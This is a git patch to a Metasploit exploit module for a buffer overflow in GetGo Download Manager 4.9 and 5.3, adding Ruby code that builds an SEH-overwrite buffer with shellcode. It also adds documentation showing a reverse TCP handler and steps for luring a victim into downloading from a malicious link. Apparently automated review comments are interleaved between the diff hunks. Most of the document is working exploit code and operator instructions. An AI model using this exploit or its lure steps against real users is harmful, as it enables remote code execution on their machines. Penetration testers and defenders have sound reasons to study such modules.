From 7d04ebcf5f76c12817c014921224d8dd45d85a90 Mon Sep 17 00:00:00 2001
From: Wei Chen
Date: Mon, 15 Oct 2018 15:47:35 -0500
Subject: [PATCH] Land #9642, support version 5 for GetGo Download Manager bof exploit

---
 .../browser/getgodm_http_response_bof.md | 30 ++++
 .../browser/getgodm_http_response_bof.rb | 158 +++++++-----------
 2 files changed, 87 insertions(+), 101 deletions(-)
 create mode 100644 documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md

diff --git a/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md b/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md
new file mode 100644
index 0000000000..afb22c8908
--- /dev/null
+++ b/documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md
@@ -0,0 +1,30 @@
+## Description
+
+This modules adds a buffer overflow exploit for GetGo Download Manager, which supports
+4.9.0.1982 and 5.3.0.2712. Versions prior should also be vulnerable.
+
+This exploit has been tested on Windows XP SP3. The vulnerable software can be downloaded
+at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe)
+
+To use this, first start the module like the following example:
+
+```
+msf5 exploit(windows/browser/getgodm_http_response_bof) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.0.12:4444
+msf5 exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3
+[*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3
+[*] Server started.
+```
+
+The exploit should give you a fake link. Pass this link to the Getgo user, and instruct them to
+do the following:
+
+1. Start GetGo Download Manager
+2. Click on the DOWNLOAD button
+3. Click on New (if the link is already copied to the clipboard, clicking on this should trigger
+   the download, and get exploited).
+4. If the link isn't in the clipboard, instruct the user to enter the URL in the URL field, and
+   click OK. The user should also get exploited this way.
diff --git a/modules/exploits/windows/browser/getgodm_http_response_bof.rb b/modules/exploits/windows/browser/getgodm_http_response_bof.rb
index dbac05a1ce..1795675aae 100644
--- a/modules/exploits/windows/browser/getgodm_http_response_bof.rb
+++ b/modules/exploits/windows/browser/getgodm_http_response_bof.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow',
       'Description' => %q{
           This module exploits a stack-based buffer overflow vulnerability in
-          GetGo Download Manager version 4.9.0.1982 and earlier, caused by an
+          GetGo Download Manager version 5.3.0.2712 earlier, caused by an
           overly long HTTP response header.
 
           By persuading the victim to download a file from a malicious server, a
@@ -26,7 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'Author' =>
         [
           'Julien Ahrens', # Vulnerability discovery
-          'Gabor Seljan' # Metasploit module
+          'Gabor Seljan', # Metasploit module for v4
+          'bzyo', # Metasploit module for v5
+          'sinn3r' # Helping Gabor and bzyo (see #4588 & #9642)
         ],
       'References' =>
         [
@@ -42,16 +44,33 @@ class MetasploitModule < Msf::Exploit::Remote
       'Platform' => 'win',
       'Payload' =>
         {
-          'BadChars' => "\x00\x0a\x0d",
-          'Space' => 2000
+          # v5 has no bad chars
+          'BadChars' => "\x00\x0a\x0d"
         },
       'Targets' =>
         [
-          [ 'Windows XP SP3',
+          [
+            'Automatic', {}
+          ],
+          [ '4.9.0.1982 on Windows XP SP3',
             {
               'Offset' => 4107,
               'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30]
             }
+          ],
+          [
+            '5.3.0.2712 on Windows XP SP3',
+            {
+              'Offset' => 4095,
+              # 0:016> u 0x72d11f39
+              # msacm32!wodMessage+0xd0f:
+              # 72d11f39 5f pop edi
+              # 72d11f3a 5e pop esi
+              # 72d11f3b c20400 ret 4
+              'Ret' => 0x72d11f39,
+              # 12253 is the same size the python PoC used
+              'MaxSize' => 12253
+            }
           ]
         ],
       'Privileged' => false,
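Review bot: The rewritten description line reads `GetGo Download Manager version 5.3.0.2712 earlier, caused by an`, which drops the word that made the version range clear; it should be `GetGo Download Manager version 5.3.0.2712 and earlier, caused by an`. Since the Targets list in this same file now names 4.9.0.1982 explicitly, the sentence could mention both tested builds rather than only the upper bound. The `%q{}` description block continues past this hunk.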
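Review bot: The new comment `# v5 has no bad chars` sits directly above a `BadChars` entry that still applies to every target, including `5.3.0.2712 on Windows XP SP3`, so the comment contradicts the line it annotates. If the list is deliberately retained because the `Payload` block is shared across targets, the comment should say that, for example `# Bad chars observed on v4; kept because the Payload block is shared by all targets`. The new `MaxSize` key has no counterpart on the v4 target, which is worth a one-line comment noting it is only consumed by the v5 handler.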
@@ -59,102 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultTarget' => 0))
   end
 
-  #
-  # Handle the HTTP request and return a response.
-  # Code borrowed from: msf/core/exploit/http/server.rb
-  #
-  def start_http(opts={})
-    # Ensture all dependencies are present before initializing HTTP
-    use_zlib
-
-    comm = datastore['ListenerComm']
-    if (comm.to_s == "local")
-      comm = ::Rex::Socket::Comm::Local
-    else
-      comm = nil
-    end
-
-    # Default the server host / port
-    opts = {
-      'ServerHost' => datastore['SRVHOST'],
-      'ServerPort' => datastore['HTTPPORT'],
-      'Comm' => comm
-    }.update(opts)
-
-    # Start a new HTTP server
-    @http_service = Rex::ServiceManager.start(
-      Rex::Proto::Http::Server,
-      opts['ServerPort'].to_i,
-      opts['ServerHost'],
-      datastore['SSL'],
-      {
-        'Msf' => framework,
-        'MsfExploit' => self
-      },
-      opts['Comm'],
-      datastore['SSLCert']
-    )
-
-    @http_service.server_name = datastore['HTTP::server_name']
-
-    # Default the procedure of the URI to on_request_uri if one isn't
-    # provided.
-    uopts = {
-      'Proc' => Proc.new { |cli, req|
-        on_request_uri(cli, req)
-      },
-      'Path' => resource_uri
-    }.update(opts['Uri'] || {})
-
-    proto = (datastore["SSL"] ? "https" : "http")
-    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
-
-    if (opts['ServerHost'] == '0.0.0.0')
-      print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
-    end
-
-    # Add path to resource
-    @service_path = uopts['Path']
-    @http_service.add_resource(uopts['Path'], uopts)
-
-    # As long as we have the http_service object, we will keep the server alive
-    while @http_service
-      select(nil, nil, nil, 1)
-    end
-  end
-
-
-  #
-  # Kill HTTP/FTP (shut them down and clear resources)
-  #
-  def cleanup
-    super
-    stop_service
-
-    begin
-      @http_service.remove_resource(datastore['URIPATH'])
-      @http_service.deref
-      @http_service.stop
-      @http_service.close
-      @http_service = nil
-    rescue
-    end
-  end
-
-
-  def on_request_uri(cli, request)
-
-    print_status("Client connected...")
-
-    unless request['User-Agent'] =~ /GetGo Download Manager 4.0/
-      print_error("Sending 404 for unknown user-agent")
-      send_not_found(cli)
-      return
-    end
-
-    sploit = rand_text_alpha(target['Offset'])
+  # This part is from Gabor Seljan
+  def exploit_v4(cli, current_taget)
+    sploit = rand_text_alpha(current_taget['Offset'])
     sploit << "\x90\x90\xEB\x06"
-    sploit << [target.ret].pack('V')
+    sploit << [current_taget.ret].pack('V')
     sploit << payload.encoded
 
     print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")
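Review bot: The parameter introduced as `current_taget` in `def exploit_v4(cli, current_taget)` is misspelled, and the same spelling carries into `exploit_v5` in the following hunk, while the caller's local is `current_target`; the names should match. The fix is `def exploit_v4(cli, current_target)`, `sploit = rand_text_alpha(current_target['Offset'])` and `sploit << [current_target.ret].pack('V')`, with the same rename in `exploit_v5`. A short doc comment on each helper stating which keys of the target hash it reads (`Offset` and `Ret`, plus `MaxSize` for v5) would make the split easier to follow than the attribution comments alone. The body of `exploit_v4` continues into the next hunk.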
@@ -162,8 +90,36 @@ class MetasploitModule < Msf::Exploit::Remote
     resp = create_response(200, sploit)
     resp.body = ""
     cli.send_response(resp)
+  end
 
-    close_client(cli)
+  # This part is from Auxilus with some help from @_sinn3r
+  def exploit_v5(cli, current_taget)
+    seh_record = generate_seh_record(current_taget.ret)
+    # Minus 4 for the SEH record
+    buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4)
+    buffer << seh_record
+    buffer << payload.encoded
+    buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length)
+    res = create_response(200, buffer)
+    cli.send_response(res)
+  end
 
+  def on_request_uri(cli, request)
+    print_status("#{cli.peerhost} connected")
+    current_target = target
+    user_agent = request.headers['User-Agent'].to_s
+
+    if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/)
+      print_status('Attempting to exploit against v4')
+      current_target = targets[1]
+      exploit_v4(cli, current_target)
+    elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/)
+      print_status('Attempting to exploit against v5')
+      current_target = targets[2]
+      exploit_v5(cli, current_target)
+    else
+      print_error('Sending 404 for unknown user-agent')
+      send_not_found(cli)
+    end
   end
 end
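Review bot: `exploit_v5` calls `Rex::Text.rand_text_alpha` while `exploit_v4` in the preceding hunk uses the bare `rand_text_alpha` mixin method for the same purpose; the two helpers should settle on one form. In `on_request_uri` both `user_agent.match(...)` calls discard the MatchData, so `match?` expresses the intent better if the framework's minimum Ruby supports it. The precedence rule encoded in the `if`/`elsif` (an explicitly selected target wins, `Automatic` falls back to the User-Agent header) is not stated anywhere; a comment above the `if` such as `# An explicit target selection takes precedence; Automatic decides from the User-Agent header` would document it.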